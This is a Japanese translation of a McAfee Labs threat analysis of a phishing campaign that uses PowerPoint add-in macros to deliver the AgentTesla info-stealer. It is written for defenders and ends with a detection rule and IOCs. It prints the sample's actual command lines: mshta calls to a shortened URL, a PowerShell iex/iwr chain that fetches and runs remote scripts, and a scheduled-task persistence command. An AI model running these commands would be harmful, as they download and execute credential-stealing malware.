PowerPointを悪用したフィッシングキャンペーンが増加

McAfee Labsは、Microsoft PowerPointのマクロ機能を利用した新しいフィッシングキャンペーンを確認しました。このキャンペーンでは、PowerPointのファイルが添付されたスパムメールが送られてきます。悪意のある添付ファイルを開くと、VBAマクロが実行され、AgentTeslaの亜種が配信されます(パスワードを盗むことでよく知られています)。これは、金融取引に関連するメールを装ったスパムメールが送られてきます。

AgentTeslaは、2014年から実行されているRAT(リモートアクセスのトロイの木馬)マルウェアです。このRATMASS(Malware-As-A-Service)としてスクリーンショット、キーロギング、クリップボードのキャプチャなどの方法で、被害者からユーザー認証情報を盗み出します。その手口は、主にフィッシングキャンペーンを介して行われます。

2021年第2四半期の間に、PowerPointのマルウェアが増加しました。

Figure 1. Trend of PPT malware over the first half of 2021

図1. PPTマルウェアの動向(2021年前半)

 

このキャンペーンでは、スパムメールに添付された拡張子が.ppamPowerPointファイルにVBAコードが含まれています。使用されたセンチメントは、図2に示すように「New PO300093 Order」で金融関連のテーマでした。添付ファイル名は「300093.pdf.ppam」です。

図2. スパムメール 

 

PPAMファイル:

このファイルタイプは、Microsoft Office 2007のリリースとともに2007年に導入されました。PowerPointのマクロに対応するOpen XMLのアドインファイルで、追加コマンド、カスタムマクロ、PowerPointのデフォルト機能を拡張するための新しいツールなど、機能を追加するためのコンポーネントが含まれます。

PowerPointはサードパーティが開発した新機能を追加するための「アドイン」をサポートしているため、攻撃者はこの機能を悪用してマクロを自動で実行します

テクニカルな分析:

「.ppam」ファイルを開くと、図3に示すようなマクロの存在を警告するセキュリティ通知のポップアップが表示されます。

Figure 3. Warning when opening the attached PowerPoint file

図3.警告文(添付されたPowerPointファイルを開くと表示される)

 

4では、ppamファイル内に存在する[Content_Types].xmlファイルの内容からPowerPointのアドイン機能を特定できることがわかります。

Figure 4. Powerpoint add-in feature with macroEnabled

図4.マクロが有効化されたPowerPointのアドイン機能

PPAMファイルは次のファイルとディレクトリを含んでおり、抽出して確認が可能です。

  • _rels\.rels 
  • [Content_Types].xml 
  • ppt\rels\presentation.xml.rels 
  • ppt\asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file 
  • ppt\presentation.xml 

5に示すように、マクロを有効化するとユーザーが気づかないうちにアドインがインストールされます。PowerPointにコンテンツやスライドが含まれてないことを確認したユーザーはファイルを閉じますが、バックエンドでマクロコードが実行されて悪意のある活動が始まります。

Figure 5. Installed Add-ins in the PowerPoint options

図5. PowerPointのオプションにインストールされたアドイン

6に示すように、マクロはアドインのauto_open()イベント内で実行されます。つまり、プレゼンテーションが開かれてアドインがロードされると、直ちにマクロが実行されます。

Figure 6.VBA Code snippet with auto_open() event

図6. VBAのauto_open()イベントのコードスニペット

PowerPointのマクロコードを実行すると、図7に示されるmshta.exe(Microsoft HTML Application)を呼び出してURLを起動します。mshtaプロセスは、CreateProcessA()APIを呼び出すことでPowerPointによって起動されます。

CreateProcessA()APIに渡されるパラメータは以下のとおり:

kernel32.CreateProcessA(00000000,mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D, 

Figure 7. VBA Code snippet containing mshta and url

図7. mshtaとURLを含むVBAコードスニペット

mshtaのコマンドラインパラメータは以下のとおり:

mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh 

The URL hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” but it didn’t get any response from “27.html” at the time of analysis. 

その後、mshta.exepowershell.exeを子プロセスとして生成します。

PowerShellのコマンドラインパラメータは以下のとおり:

powershell.exe - ”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt‘) -useB); 

PowerShell downloads and executed script files from the above-mentioned URLs.  

The below Figure 8 shows the content of the first url 

PowerShellは上記URLからスクリプトファイルをダウロードして実行します。

以下の図8で示された、ひとつめのURLの内容 – “hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt”:

Figure 8. Binary file content

図8. バイナリファイルの内容

ダウンロードされた各PowerShellファイルには、2つの大きなarrayに格納された2つのバイナリファイルが存在します。 1つ目のファイルはローダーとして機能するEXEファイルで、2つ目のファイルはAgentTeslaの変種であるDLLファイルです。PowerShellは、コマンドラインに記載されたURLからAgentTeslaのペイロードを取得し、それをデコードして、MSBuild.exeを起動してペイロードを取り込みます。

タスクのスケジュール

継続性を持たせるため、「Task Scheduler」にスケジュールされたタスクを作成、C:Windows®System32SECOTAKSA以下にタスクファイルをドロップして、キャンペーンを効果的に実行します。

Figure 9. Code snippet to create a new schedule task

図9. 新しいスケジュールタスクを作成するコードスニペット

新しいタスクの名前は「SECOTAKSA」です。「mshta hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html」のコマンドを実行して、80分毎に一回呼び出します。

schtasks のコマンドラインパラメータは以下のとおり:

schtasks.exe - “C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”\””MsHtA””\””hxxp://1230948%1230948@0v2x.blogspot.com/p/27.html\“” 

 

感染チェーン:

Figure 10. Infection Chain

図10. 感染チェーン

プロセスツリー:

Figure 11. Process Tree

図11. プロセスツリー

対策:

McAfee Endpoint Security (ENS)Windowsシステムセキュリティ(WSS) 製品は、この種のマルウェアをDATでカバーします。

SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182を含む悪意のあるPPAMドキュメントは、「W97M/Downloader.dkw」として検出されます。

PPAMドキュメントは、AMSI-FKN! としてENSAMSI機能でもブロックされます。

さらに、McAfee Endpoint Security製品のエクスプロイト防止機能は、下記エキスパートルールを追加することによってマルウェアの感染チェーンをブロックして、この悪質な攻撃からお客様を保護します。

Expert Rule authored based on the below infection chain: 

POWERPNT.EXE –> mshta.exe  

Expert Rule: 

Rule { 

  Process { 

    Include OBJECT_NAME { -v “powerpnt.exe” } 

  } 

  Target { 

    Match PROCESS { 

       Include OBJECT_NAME { -v “mshta.exe” } 

       Include PROCESS_CMD_LINE { -v “**http**” } 

       Include -access “CREATE” 

    } 

  } 

} 

IOCs 

URLs: 

hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh 

hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html 

hxxps://p8hj[.]blogspot[.]com/p/27.html 

hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt  

hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt  

hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt 

EML files: 

72e910652ad2eb992c955382d8ad61020c0e527b1595619f9c48bf66cc7d15d3 

0afd443dedda44cdd7bd4b91341bd87ab1be8d3911d0f1554f45bd7935d3a8d0 

fd887fc4787178a97b39753896c556fff9291b6d8c859cdd75027d3611292253 

38188d5876e17ea620bbc9a30a24a533515c8c2ea44de23261558bb4cad0f8cb  

PPAM files: 

fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 

6c45bd6b729d85565948d4f4deb87c8668dcf2b26e3d995ebc1dae1c237b67c3 

9df84ffcf27d5dea1c5178d03a2aa9c3fb829351e56aab9a062f03dbf23ed19b 

ad9eeff86d7e596168d86e3189d87e63bbb8f56c85bc9d685f154100056593bd 

c22313f7e12791be0e5f62e40724ed0d75352ada3227c4ae03a62d6d4a0efe2d 

Extracted AgentTesla files: 

71b878adf78da89dd9aa5a14592a5e5da50fcbfbc646f1131800d02f8d2d3e99 

90674a2a4c31a65afc7dc986bae5da45342e2d6a20159c01587a8e0494c87371

 

※本ページの内容は2021年9月22日(US時間)更新の以下のMcAfee Enterprise Blogの内容です。
原文: Malicious PowerPoint Documents on the Rise
著者:
 (Anuradha M)